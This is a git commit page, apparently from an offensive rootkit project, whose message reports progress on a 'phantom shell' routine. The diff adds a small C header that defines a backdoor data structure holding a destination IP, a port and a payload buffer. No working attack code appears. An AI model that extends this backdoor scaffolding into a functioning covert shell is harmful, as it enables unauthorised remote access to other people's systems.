Further completed the phantom shell routine and added more checks in TC, still not finished, payload rewriting remains, but the rest is fully ready

This commit is contained in:
h3xduck
2022-05-10 23:04:19 -04:00
parent f2c3624e8b
commit 567d8d706c
12 changed files with 2982 additions and 2892 deletions

View File

@@ -0,0 +1,13 @@
#ifndef __H_STRUCT_COMMON
#define __H_STRUCT_COMMON
struct backdoor_phantom_shell_data{
int active;
unsigned int d_ip;
unsigned short d_port;
char payload[64];
};
#endif